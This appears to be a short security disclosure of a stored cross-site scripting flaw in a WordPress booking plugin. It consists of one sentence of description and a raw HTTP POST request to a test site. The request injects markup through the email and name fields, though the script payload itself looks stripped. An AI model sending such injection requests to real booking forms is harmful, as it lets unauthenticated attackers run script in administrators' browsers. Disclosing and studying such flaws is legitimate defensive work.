It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.
POST /booking-form/ HTTP/1.1 Host: test.local User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://test.local/booking-form/ Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283 Content-Length: 1809 Connection: close Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676 Upgrade-Insecure-Requests: 1 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“cp_pform_psequence” _1 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“cp_appbooking_pform_process” 1 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“cp_appbooking_id” 2 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“cp_ref_page” http://test.local/booking-form/ -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“form_structure_1” -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“refpage_1” http://test.local/booking-form/ -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“fieldname1_1” 2019-07-13 12:00/13:00 0 1 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“fieldname1_1_services” 0 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“fieldname1_1_capacity” 0 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“tcostfieldname1_1” 1.00 -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“email_1” “><” -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“fieldname2_1” “><” -----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=“hdcaptcha_cp_appbooking_post” auvoe -----------------------------11713224624340267851833710283–